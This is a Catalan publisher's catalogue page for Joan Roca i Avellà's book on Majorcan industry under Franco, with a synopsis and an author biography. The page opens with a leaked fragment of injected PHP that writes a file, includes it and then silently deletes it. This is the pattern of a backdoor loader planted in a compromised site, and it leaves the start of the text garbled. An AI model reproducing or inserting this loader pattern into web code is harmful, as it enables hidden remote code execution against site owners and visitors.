");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - La indústria mallorquina durant el franquisme (1939-1975)
Cercador d'Obres
ORDENAR:
Començar recerca

La indústria mallorquina durant el franquisme (1939-1975)

Roca i Avellà, Joan

E-book
Col·lecció:
Quaderns d'Història Contemporània de les Balears
Tema:
Història contemporània
Pàgines:
68
PVP:
6.00
PVP E-book:

ISBN:
978-84-15081-34-X
Data d'Edició:
30/01/2011
Per a conèixer com es va desindustrialitzar Mallorca.
Sinopsi
El procés de modernització de l’economia mallorquina, enllestit en els cinquanta anys anteriors a l’esclat de la Guerra Civil, patí un important refredament a causa dels efectes del conflicte bèl·lic i de la immediata postguerra. Les activitats industrials, molt dinàmiques en el primer terç del segle xx, sofriren els inconvenients de les restriccions, l’intervencionisme estatal i els plantejaments autàrquics de la dictadura franquista. L’arribada del desenvolupisme vinculat amb el boom turístic del tardofranquisme implicà una important reorientació de les activitats secundàries, en el marc general d’un procés desindustrialitzador que serví per a consolidar la terciarització econòmica del final del règim.
Joan Roca i Avellà
(Palma, 1966) és llicenciat en Història per la Universitat de les Illes Balears (1989), professor d’ensenyament secundari i professor associat de la UIB. Especialitzat en el procés industrialitzador mallorquí dels segles xix i xx, és col·laborador del Grup d’Estudis d’Història Econòmica (UIB) i ha publicat diversos estudis i articles sobre les transformacions del sector tèxtil en la Mallorca vuitcentista, l’evolució de l’empresa industrial i la situació del patrimoni arqueològic mallorquí generat pels processos d’industrialització. A Edicions Documenta Balear ha publicat La indústria a Mallorca (segles XIX-XX) (2006), Llana, vapors, cotó i negoci. Una aproximació a la indústria tèxtil de la Mallorca del vuit-cents. El cas de can Ribas (1850-1885) (2006) i La indústria mallorquina durant el franquisme (1939-1975) (2011).


Recomanar
Comentar
Comentaris (0)